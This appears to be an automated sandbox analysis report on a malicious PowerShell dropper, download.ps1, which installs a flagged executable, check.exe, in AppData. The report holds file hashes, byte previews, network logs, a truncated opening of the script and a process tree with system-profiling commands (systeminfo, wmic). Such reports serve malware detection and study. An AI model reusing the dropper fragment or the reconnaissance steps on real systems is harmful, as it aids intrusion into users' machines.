                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6222
                                                                                                                                                                                                            Entropy (8bit):3.7208771259316853
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:9KuCmP8oDkvhkvCCtRBZbEr2H9+ZbEn2H9y:9KUP7RBZb+ZLy
                                                                                                                                                                                                            MD5:403B581FECE1361F3DB8A54B14BFEC10
                                                                                                                                                                                                            SHA1:DE92743FA53123FE243C1CADB0B712B7B8E66FB3
                                                                                                                                                                                                            SHA-256:C4815012D66CAFA46C6463B6A26BE4931D4332C74FBEB329DD655AD958070173
                                                                                                                                                                                                            SHA-512:62BE29F45FC5C1E4A63F9102AD9ECFDC752501EC89B80FD473D8A7561E6420F548237FD72E81F423E98F176E1D09EDEDF36875F1EE49198E9C679FE7DEC9DBC0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:...................................FL..................F.".. ......Yd......TJ..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......y.Yd....V.TJ......TJ......t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)B.YQ...........................d...A.p.p.D.a.t.a...B.V.1......YU...Roaming.@......EW)B.YU...........................o...R.o.a.m.i.n.g.....\.1.....EW.C..MICROS~1..D......EW)B.YQ............................. .M.i.c.r.o.s.o.f.t.....V.1.....EW.D..Windows.@......EW)B.YQ...........................-4).W.i.n.d.o.w.s.......1.....EW+B..STARTM~1..n......EW)B.YQ.....................D.....b60.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW(C..Programs..j......EW)B.YQ.....................@.......D.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)BEW)B..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW)B.YX......0..........
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6222
                                                                                                                                                                                                            Entropy (8bit):3.7208771259316853
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:9KuCmP8oDkvhkvCCtRBZbEr2H9+ZbEn2H9y:9KUP7RBZb+ZLy
                                                                                                                                                                                                            MD5:403B581FECE1361F3DB8A54B14BFEC10
                                                                                                                                                                                                            SHA1:DE92743FA53123FE243C1CADB0B712B7B8E66FB3
                                                                                                                                                                                                            SHA-256:C4815012D66CAFA46C6463B6A26BE4931D4332C74FBEB329DD655AD958070173
                                                                                                                                                                                                            SHA-512:62BE29F45FC5C1E4A63F9102AD9ECFDC752501EC89B80FD473D8A7561E6420F548237FD72E81F423E98F176E1D09EDEDF36875F1EE49198E9C679FE7DEC9DBC0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:...................................FL..................F.".. ......Yd......TJ..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......y.Yd....V.TJ......TJ......t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)B.YQ...........................d...A.p.p.D.a.t.a...B.V.1......YU...Roaming.@......EW)B.YU...........................o...R.o.a.m.i.n.g.....\.1.....EW.C..MICROS~1..D......EW)B.YQ............................. .M.i.c.r.o.s.o.f.t.....V.1.....EW.D..Windows.@......EW)B.YQ...........................-4).W.i.n.d.o.w.s.......1.....EW+B..STARTM~1..n......EW)B.YQ.....................D.....b60.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW(C..Programs..j......EW)B.YQ.....................@.......D.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)BEW)B..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW)B.YX......0..........
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):38755410
                                                                                                                                                                                                            Entropy (8bit):7.995839341470473
                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                            SSDEEP:786432:O+gX4BMdhwzTQXR5FbPp6FcSS5U/LT2KzVyPVLBdebXMb8VH/zEa:MXGMK4XR3bLSCU/+6yPl3ebcBa
                                                                                                                                                                                                            MD5:F17797CAAB0F1CB8D5813853AAD786CA
                                                                                                                                                                                                            SHA1:5B67F3D290B2E027EA617F239310BAE47083EE54
                                                                                                                                                                                                            SHA-256:C24D6A9DE8F394854E91A84ECE64E9A5A8FCC8B66E7E67AC47473E5CF709CFDE
                                                                                                                                                                                                            SHA-512:55D1F0217028564189545E9F7ECF8E0B087BABA792F97A3ADD825841C16A1B52368042EF08A1860E726749B4706456EC52236245C3CD8B15545630D8881D80A6
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n=..*\.Z*\.Z*\.Za$.[-\.Za$.[.\.Za$.[ \.Z:..Z)\.Z:..[#\.Z:..[;\.Z:..[.\.Za$.[!\.Z*\.Z.\.Zb..[3\.Zb..[+\.ZRich*\.Z........PE..d...g.Vg.........."....).....\.................@....................................J.O...`.................................................\...x....p.......@..P"...........p..d...................................@...@............................................text............................... ..`.rdata..P*.......,..................@..@.data....S..........................@....pdata..P"...@...$..................@..@.rsrc........p......................@..@.reloc..d....p......................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):38486075
                                                                                                                                                                                                            Entropy (8bit):7.998262931276649
                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                            SSDEEP:786432:L6ivV/JVTmIg5sc8TcKuWLN4xu5GFsxHF8lhP7TK5yt86iJ/P4h:/vBfKIrc8Tcfrx2GFgF8lhDT4yez4h
                                                                                                                                                                                                            MD5:21786840938E823B9AA236AD8E27FC97
                                                                                                                                                                                                            SHA1:B26CE17507089D5BFEA50DEC8E987E1EE69AC79F
                                                                                                                                                                                                            SHA-256:08BE38EC51A77DE7FB197A79B5E15AD88AF3FC1975A883CD7D316584B4865939
                                                                                                                                                                                                            SHA-512:9C8323CC52762649ED5240F50EEEB2C03237E528BC1F38607D592CC60818A7125C61280096AEA7C810EEA0DF6997447F37C05C6979991FBE7BC8935F767DF397
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:PK........4..Y....?K.R\O.....check.exe.]{`.W...TZ...... ..e...hw.......hh.j...V....c.`...]}IhU...,mQ-.."(Z...s...D..........;.{...d..os.l.:....l%6....._5..o....w.,..w..?........=a.#...=.p...{B.8.....}...yt...bc.I.e..}....:..72.r.M.....?/d..m.sH[~^.n....i....`\8.%...y....\.N...d<.>.3....g...F..6......I[+[=G......m(..o...'N..n...t....-?.3...>..m....A...b=j."....).2..../.[.[V....(...f....?..w.....V9lK..>.C..).zY.`.8..n.mD...F.F"...Y..=..9j..w......s....s..6...x]^+I.....Jy.&N..;..x..R......c..pT].+[4)q..N...j.).cI...F+j.]N[Q.V......A)R....^...*.n....J(jA.:.2.hhb.R.Ht..............!.._=.rV....;l...j......O.r...W.(..y......Pl[.....l.-ak>u`..)..s!.i..]..)..>.Z..a.e.z7.n..X..C..:&...F.c.....'.H...c.h..*......3...;.x...]...B.......W.$!J......OJ..@z.U.W..-7..@.7m..^.T..J....D.P.}...).....T.?1..|8o.Z..S..+*.....e...Y...R.....,...C........u.6.@E..8.nV.@.....w.o.o.o.}e.u..9u...)..(..<UA..?..?1..........SJ3.....b.R.....+.. z..r.....$%.Ot..j..)-.`5R
                                                                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1835008
                                                                                                                                                                                                            Entropy (8bit):4.372109001361566
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6144:3FVfpi6ceLP/9skLmb0qyWWSPtaJG8nAge35OlMMhA2AX4WABlguNFiL:1V1cyWWI/glMM6kF7jq
                                                                                                                                                                                                            MD5:CBE9432AD8C2A37EF8CD3F767BB881A5
                                                                                                                                                                                                            SHA1:A9FA30A4C35F08660D3E00CC44E07F81F473519D
                                                                                                                                                                                                            SHA-256:B3F77B9F2B792DCEBBE6E92EEA870AD222145B67319CD2B21BD8A780E04ED8D5
                                                                                                                                                                                                            SHA-512:69479D985C19C5CBD36804B0451F4D921746861961E390B1D45500C38504337016B0C5F6956BF81A46F918690C7F6AC6B5360EE9B521F8369B265B88B4592F01
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:regfC...C....\.Z.................... ....0......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..`.UJ................................................................................................................................................................................................................................................................................................................................................w2........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            File type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                            Entropy (8bit):5.998969191023309
                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                              File name:download.ps1
                                                                                                                                                                                                              File size:51'316'505 bytes
                                                                                                                                                                                                              MD5:828e0cc3c14385d28606aca4c5edf657
                                                                                                                                                                                                              SHA1:bc962c5c0d31e0e0c13c0c3505a53ec3d3251a25
                                                                                                                                                                                                              SHA256:aef32c3cd1cd6bd44239ca9a75064cfa31fc0d582e33683c1c602559b7e107f8
                                                                                                                                                                                                              SHA512:0b5cc9b5741242da8d5dc053dd50a61d4b9efd308f158978d716c288219aedd34898f59475d3cb845521f34d0dd3df922df280bc1450821872e9cce10a1ef074
                                                                                                                                                                                                              SSDEEP:49152:Mlh6KeiZ9CruD6ch8wsawJRg2bN3oRIeEwd5RifHsfSn6DTIakmcWMlcsTk0bGas:6
                                                                                                                                                                                                              TLSH:F6B73320AEAA6DBE0A6CC33D707F5F1D1BB00FD1844DE1DA47A0B9C7165FB41562B829
                                                                                                                                                                                                              File Content Preview:${random_error_action_preference}="Stop";Set-Location $Env:AppData;${random_install_path}="$Env:AppData\kbHYWyel";if(Test-Path ${random_install_path}){if(Test-Path "$Env:AppData\VdfJrgVq.txt"){Remove-Item "$Env:AppData\VdfJrgVq.txt"};Exit};$domain=(Get-Wm
                                                                                                                                                                                                              Icon Hash:3270d6baae77db44
                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                              Dec 9, 2024 17:11:33.311920881 CET49712443192.168.2.8104.20.22.46
                                                                                                                                                                                                              Dec 9, 2024 17:11:33.311954021 CET44349712104.20.22.46192.168.2.8
                                                                                                                                                                                                              Dec 9, 2024 17:11:33.312066078 CET49712443192.168.2.8104.20.22.46
                                                                                                                                                                                                              Dec 9, 2024 17:11:33.312926054 CET49712443192.168.2.8104.20.22.46
                                                                                                                                                                                                              Dec 9, 2024 17:11:33.312942028 CET44349712104.20.22.46192.168.2.8
                                                                                                                                                                                                              Dec 9, 2024 17:11:34.615803957 CET44349712104.20.22.46192.168.2.8
                                                                                                                                                                                                              Dec 9, 2024 17:11:34.630537987 CET49712443192.168.2.8104.20.22.46
                                                                                                                                                                                                              Dec 9, 2024 17:11:34.630562067 CET44349712104.20.22.46192.168.2.8
                                                                                                                                                                                                              Dec 9, 2024 17:11:34.632226944 CET44349712104.20.22.46192.168.2.8
                                                                                                                                                                                                              Dec 9, 2024 17:11:34.632333994 CET49712443192.168.2.8104.20.22.46
                                                                                                                                                                                                              Dec 9, 2024 17:11:34.652818918 CET49712443192.168.2.8104.20.22.46
                                                                                                                                                                                                              Dec 9, 2024 17:11:34.653145075 CET44349712104.20.22.46192.168.2.8
                                                                                                                                                                                                              Dec 9, 2024 17:11:34.653250933 CET49712443192.168.2.8104.20.22.46
                                                                                                                                                                                                              Dec 9, 2024 17:11:34.656131983 CET49712443192.168.2.8104.20.22.46
                                                                                                                                                                                                              Dec 9, 2024 17:11:49.439023018 CET49718443192.168.2.8104.20.22.46
                                                                                                                                                                                                              Dec 9, 2024 17:11:49.439065933 CET44349718104.20.22.46192.168.2.8
                                                                                                                                                                                                              Dec 9, 2024 17:11:49.439155102 CET49718443192.168.2.8104.20.22.46
                                                                                                                                                                                                              Dec 9, 2024 17:11:49.439971924 CET49718443192.168.2.8104.20.22.46
                                                                                                                                                                                                              Dec 9, 2024 17:11:49.439982891 CET44349718104.20.22.46192.168.2.8
                                                                                                                                                                                                              Dec 9, 2024 17:11:50.708775043 CET44349718104.20.22.46192.168.2.8
                                                                                                                                                                                                              Dec 9, 2024 17:11:50.709450960 CET49718443192.168.2.8104.20.22.46
                                                                                                                                                                                                              Dec 9, 2024 17:11:50.709491968 CET44349718104.20.22.46192.168.2.8
                                                                                                                                                                                                              Dec 9, 2024 17:11:50.710625887 CET44349718104.20.22.46192.168.2.8
                                                                                                                                                                                                              Dec 9, 2024 17:11:50.710695982 CET49718443192.168.2.8104.20.22.46
                                                                                                                                                                                                              Dec 9, 2024 17:11:50.712347984 CET49718443192.168.2.8104.20.22.46
                                                                                                                                                                                                              Dec 9, 2024 17:11:50.712522984 CET44349718104.20.22.46192.168.2.8
                                                                                                                                                                                                              Dec 9, 2024 17:11:50.712568045 CET49718443192.168.2.8104.20.22.46
                                                                                                                                                                                                              Dec 9, 2024 17:11:50.712760925 CET49718443192.168.2.8104.20.22.46
                                                                                                                                                                                                              Dec 9, 2024 17:11:57.915780067 CET49722443192.168.2.8104.20.22.46
                                                                                                                                                                                                              Dec 9, 2024 17:11:57.915832996 CET44349722104.20.22.46192.168.2.8
                                                                                                                                                                                                              Dec 9, 2024 17:11:57.915903091 CET49722443192.168.2.8104.20.22.46
                                                                                                                                                                                                              Dec 9, 2024 17:11:57.916809082 CET49722443192.168.2.8104.20.22.46
                                                                                                                                                                                                              Dec 9, 2024 17:11:57.916826963 CET44349722104.20.22.46192.168.2.8
                                                                                                                                                                                                              Dec 9, 2024 17:11:59.161834955 CET44349722104.20.22.46192.168.2.8
                                                                                                                                                                                                              Dec 9, 2024 17:11:59.162587881 CET49722443192.168.2.8104.20.22.46
                                                                                                                                                                                                              Dec 9, 2024 17:11:59.162609100 CET44349722104.20.22.46192.168.2.8
                                                                                                                                                                                                              Dec 9, 2024 17:11:59.163690090 CET44349722104.20.22.46192.168.2.8
                                                                                                                                                                                                              Dec 9, 2024 17:11:59.163758993 CET49722443192.168.2.8104.20.22.46
                                                                                                                                                                                                              Dec 9, 2024 17:11:59.165077925 CET49722443192.168.2.8104.20.22.46
                                                                                                                                                                                                              Dec 9, 2024 17:11:59.165205956 CET44349722104.20.22.46192.168.2.8
                                                                                                                                                                                                              Dec 9, 2024 17:11:59.165234089 CET49722443192.168.2.8104.20.22.46
                                                                                                                                                                                                              Dec 9, 2024 17:11:59.165283918 CET49722443192.168.2.8104.20.22.46
                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                              Dec 9, 2024 17:11:33.168961048 CET5383653192.168.2.81.1.1.1
                                                                                                                                                                                                              Dec 9, 2024 17:11:33.307643890 CET53538361.1.1.1192.168.2.8
                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                              Dec 9, 2024 17:11:33.168961048 CET192.168.2.81.1.1.10x37c8Standard query (0)nodejs.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                              Dec 9, 2024 17:11:33.307643890 CET1.1.1.1192.168.2.80x37c8No error (0)nodejs.org104.20.22.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Dec 9, 2024 17:11:33.307643890 CET1.1.1.1192.168.2.80x37c8No error (0)nodejs.org104.20.23.46A (IP address)IN (0x0001)false

                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                              Start time:11:10:47
                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
                                                                                                                                                                                                              Imagebase:0x7ff6cb6b0000
                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:1
                                                                                                                                                                                                              Start time:11:10:47
                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                              Imagebase:0x7ff6ee680000
                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:4
                                                                                                                                                                                                              Start time:11:11:16
                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\kbHYWyel\check.exe"
                                                                                                                                                                                                              Imagebase:0x7ff61e8e0000
                                                                                                                                                                                                              File size:38'755'410 bytes
                                                                                                                                                                                                              MD5 hash:F17797CAAB0F1CB8D5813853AAD786CA
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:5
                                                                                                                                                                                                              Start time:11:11:22
                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\kbHYWyel\check.exe"
                                                                                                                                                                                                              Imagebase:0x7ff61e8e0000
                                                                                                                                                                                                              File size:38'755'410 bytes
                                                                                                                                                                                                              MD5 hash:F17797CAAB0F1CB8D5813853AAD786CA
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:6
                                                                                                                                                                                                              Start time:11:11:26
                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\kbHYWyel\check.exe"
                                                                                                                                                                                                              Imagebase:0x7ff61e8e0000
                                                                                                                                                                                                              File size:38'755'410 bytes
                                                                                                                                                                                                              MD5 hash:F17797CAAB0F1CB8D5813853AAD786CA
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:9
                                                                                                                                                                                                              Start time:11:11:29
                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                              Path:C:\Windows\System32\systeminfo.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:systeminfo
                                                                                                                                                                                                              Imagebase:0x7ff669bc0000
                                                                                                                                                                                                              File size:110'080 bytes
                                                                                                                                                                                                              MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:10
                                                                                                                                                                                                              Start time:11:11:29
                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                              Imagebase:0x7ff7cdcc0000
                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:12
                                                                                                                                                                                                              Start time:11:11:30
                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"
                                                                                                                                                                                                              Imagebase:0x7ff637610000
                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:13
                                                                                                                                                                                                              Start time:11:11:31
                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                              Imagebase:0x7ff6ee680000
                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:14
                                                                                                                                                                                                              Start time:11:11:31
                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:wmic computersystem get manufacturer
                                                                                                                                                                                                              Imagebase:0x7ff7afb80000
                                                                                                                                                                                                              File size:576'000 bytes
                                                                                                                                                                                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:15
                                                                                                                                                                                                              Start time:11:11:36
                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\kbHYWyel\check.exe"
                                                                                                                                                                                                              Imagebase:0x7ff61e8e0000
                                                                                                                                                                                                              File size:38'755'410 bytes
                                                                                                                                                                                                              MD5 hash:F17797CAAB0F1CB8D5813853AAD786CA
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:16
                                                                                                                                                                                                              Start time:11:11:36
                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\kbHYWyel\check.exe"
                                                                                                                                                                                                              Imagebase:0x7ff61e8e0000
                                                                                                                                                                                                              File size:38'755'410 bytes
                                                                                                                                                                                                              MD5 hash:F17797CAAB0F1CB8D5813853AAD786CA
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                              Has exited:true

